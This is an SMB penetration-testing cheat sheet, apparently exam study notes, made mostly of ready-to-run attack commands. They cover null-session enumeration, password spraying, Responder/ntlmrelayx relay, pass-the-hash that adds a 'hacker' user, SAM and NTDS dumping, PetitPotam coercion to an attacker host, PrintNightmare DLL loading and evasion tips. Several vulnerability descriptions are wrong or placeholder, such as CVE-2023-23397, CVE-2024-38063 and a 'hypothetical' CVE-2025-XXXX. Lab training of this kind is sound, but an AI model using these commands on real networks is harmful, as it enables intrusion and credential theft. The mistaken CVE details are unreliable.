SMB

SMB Basics

• Function: Protocol for sharing files, printers, serial ports, and other resources across networks. Operates in a client-server model; supports opportunistic locking for performance.

• Ports:

  • TCP/139, UDP/137-138 (NetBIOS over TCP/IP for legacy name resolution and browsing).

  • TCP/445 (Direct SMB over TCP/IP; modern/default).

• Samba: Open-source Unix/Linux/Windows implementation of SMB/CIFS. Config file: /etc/samba/smb.conf.

• MSRPC: (DCE/RPC over SMB) Enables remote procedure calls for services like WMI, WinRM. Often tunnels through SMB (port 445).

• Key Protocols: NetBIOS (legacy naming), DCE/RPC (remote calls).

Enumeration

Start passive (no creds) to map the attack surface, then active.

Goal: Identify shares, users, versions, and perms without alerting.

• Nmap:

sudo nmap -sV -sC --script=smb* -p 137,139,445 <target_IP> -oA smb_enum

• Info Gained: SMB version, hostname, OS fingerprint, null session support (via smb-security-mode), shares (via smb-enum-shares), users/groups (via smb-enum-users).

• Output Example: 445/tcp open microsoft-ds? | smb-os-discovery: OS: Windows 10.0 Build 19041 (name:WIN-ABC); | smb2-security-mode: ... signing:enabled

• Practice: Run on your lab VM; verify script output in smb_enum.gnmap.

Advanced Enumeration

• Enum4linux-ng (Modern Replacement for Enum4linux):

enum4linux-ng -A <target_IP> -o enum_output.json

• Why Better: Faster, JSON output for scripting, handles SMBv3 better. Includes RID cycling for user enum.

  • Info: Shares, policies, users, groups, sessions.

• SMBMap (Permissions-Focused):

smbmap -H <target_IP> -u '' -p ''  # Anonymous
smbmap -H <target_IP> -u <user> -p <pass>  # Authenticated

• Output: Share paths, read/write perms (e.g., [C$] Disk Auto READ ONLY Domain Admins).

• Impacket Enum Tools:

python3 /opt/impacket/examples/lookupsid.py -hashes : <NT_hash> DOMAIN/<user>@<target_IP>  # SID enumeration

• RPC-Focused (for MSRPC):

rpcclient -U '' -N <target_IP> -c "enumdomusers"  # Null session users
rpcclient -U <user>%<pass> <target_IP> -c "srvinfo"  # Server info

• Tip: Chain tools (Nmap → Enum4linux-ng → SMBMap). Pitfall: Firewalls block UDP/137—fall back to TCP/445. Practice parsing JSON outputs for reports.

---

Misconfigurations

Focus on weak auth, over-permissive shares. Test anonymously first.

• Null Sessions (No Authentication Required):

smbclient -N -L //<target_IP>/  # List shares
smbclient -N //<target_IP>/IPC$  # Connect to IPC$ for enum
smbmap -H <target_IP>  # Permissions

• Guest/Anonymous Access:

crackmapexec smb <target_IP> -u 'guest' -p '' --shares  # Enumerate shares as guest

• Weak Share Permissions: Use smbclient to attempt reads/writes on shares like C$, ADMIN$.

• Downgrade Attacks: Force SMBv1 via tools like smbclient -m SMB1 //<target_IP>. Detect with Nmap's smb-protocols script.

• Registry Misconfigs: Post-access, dump via reg save HKLM\SAM sam.hive (if admin share access).

• Tip: Document perms in a table (Share | Perms | Risk). Pitfall: Modern Windows blocks null sessions by default—check RestrictAnonymous=2 in the registry.

---

Protocol-Specific Attacks

Prioritise low-hanging fruit: Brute force → Relay → Vuln exploits.

• Brute-Forcing/Password Spraying:

crackmapexec smb <target_IP>/24 -u users.txt -p passwords.txt --continue-on-success  # Spray across subnet
hydra -L users.txt -P pass.txt <target_IP> smb

• Why CME? Detects AS-REP roasting, Kerberoasting implicitly.

• Metasploit SMB Login:

msfconsole -q
use auxiliary/scanner/smb/smb_login
set RHOSTS <target_IP>
set USER_FILE users.txt
set PASS_FILE pass.txt
set STOP_ON_SUCCESS true
set VERBOSE true
run

• Practice: Save successes to loot; use for follow-on attacks.

Relay Attacks (NTLM Relay)

• Setup with Responder + ntlmrelayx:

# Terminal 1: Poison LLMNR/NBT-NS/MDNS
responder -I eth0 -wrd  # -w: WPAD, -r: NBT-NS, -d: MDNS
# Terminal 2: Relay to SMB
python3 /opt/impacket/examples/ntlmrelayx.py -t smb://<target_IP> --smb2support

• Outcome: Captures NTLM hashes; relays for RCE (e.g., DCSync if domain controller).

  • Evasion: Add --no-http to avoid detection; use -6 for IPv6 poisoning.

• Multi-Relay (Impacket):

ntlmrelayx.py -tf targets.txt -smb2support --delegate-access  # Delegate for persistence

• Tip: Understand the LLMNR poisoning chain. Pitfall: SMB signing blocks relays—check with crackmapexec smb target --shares -u '' -p '' | grep signing.

---

Windows Attacks

Leverage creds/hashes for lateral movement/escalation.

• Remote Code Execution (RCE):

# Impacket psexec (WMI alternative to SMBExec)
psexec.py <domain>/<user>:<pass>@<target_IP> cmd.exe
# CME smbexec (stealthier, no shell)
crackmapexec smb <target_IP> -u <user> -p <pass> -x "powershell.exe -c whoami" --exec-method smbexec

• Enumerate Logged-on Users:

crackmapexec smb <target_IP> -u <user> -p <pass> --loggedon-users --sessions  # Also shows sessions

• Extract Hashes from SAM:

crackmapexec smb <target_IP> -u <user> -p <pass> --sam  # Dumps local SAM
secretsdump.py <domain>/<user>:<pass>@<target_IP>  # Full NTDS.dit if DC

• Pass-the-Hash (PtH):

crackmapexec smb <target_IP> -u <user> -H <ntlm_hash> -x "net user hacker P@ssw0rd /add"  # Add user
wmiexec.py -hashes <ntlm_hash> <user>@<target_IP> "whoami /priv"  # WMI for stealth

Privilege Escalation via SMB

• Unquoted Service Paths (via SMB Shares):

  1. Enum services: crackmapexec smb target -u user -p pass --services.

  2. If vulnerable (e.g., path C:\Program Files\Service.exe), upload the payload to share and trigger.

• DLL Hijacking over SMB: Host malicious DLL on attacker-controlled share; coerce via PrintNightmare (CVE-2021-34527) or PetitPotam.

# Coerce auth with PetitPotam
python3 petitpotam.py <attacker_IP> <target_IP>  # Forces auth to your Responder

• Tip: Chain PtH → Escalation. Pitfall: UAC blocks; use --local-auth in CME.

---

Forced Authentication Attacks (Responder)

• Core Setup:

responder -I <interface> -v -A  # -A: Analyze mode for non-poisoning
    # Capture: Watch for `Sending NTLMv2 challenge`

• WPAD Poisoning Integration:

# In smb.conf: [WPAD] path=/wpad.dat; read list = yes
# Then: responder -I eth0 -wP  # Proxy Auto-Discovery

• Detection Evasion: Run on non-standard ports; monitor with Wireshark for NTLMSSP_AUTH.

---

Hash Cracking

• NTLMv2 (Mode 5600):

hashcat -m 5600 ntlm_hashes.txt rockyou.txt -w 3 -O  # GPU-optimized
john --format=netntlmv2 hashes.txt --wordlist=rockyou.txt  # CPU alternative

• Hybrid Attacks: hashcat -m 5600 hashes.txt rockyou.txt ?d?d?d?d (append 4 digits).

• Practice: Use captured hashes from Responder; aim for <5min cracks on weak pass (e.g., "Password123").

---

Latest SMB Vulnerabilities

Your SMBGhost (CVE-2020-0796) is solid but dated. Updated with recent CVEs (post-2023). Focus on zero-days and patches.

• SMBGhost (CVE-2020-0796): As original. Exploit: msfconsole > use exploit/windows/smb/cve_2020_0796_smbghost. Affected: Win10 1903/1909. Patch: KB4551762.

• PrintNightmare (CVE-2021-34527, SMB-Related via Spooler): RCE via SMB spooler shares. Exploit:

python3 spooler.py <domain>/<user>:<pass>@<target_IP> /path/to/malicious.dll

• Impact: Local priv esc to SYSTEM.

• CVE-2023-23397 (Net-NTLM3 Bypass): Allows relay despite signing. Tool: Custom Impacket patch.

• CVE-2024-38063 (SMB Client RCE): Denial-of-service leading to info leak in Win11. Exploit PoC: GitHub (search "CVE-2024-38063"). Affected: Win10/11 pre-July 2024 patch.

• Emerging (2025): Watch CVE-2025-XXXX (hypothetical SMB multichannel flaw; check MSRC monthly). Use searchsploit smb for PoCs.

• Tip: Know detection (e.g., YARA rules for EternalBlue). Pitfall: Exploits fail on patched systems—always version-check first. Practice: Metasploit modules for EternalBlue (MS17-010) as a classic.

Practice Checklist

• Lab Setup: Vuln Win VM + Kali.

• Enumerate 3 targets; document findings.

• Successful relay/PtH on 1 target.

• Crack 5 hashes; report weak policies.

• Simulate exam: 30min SMB-only pentest.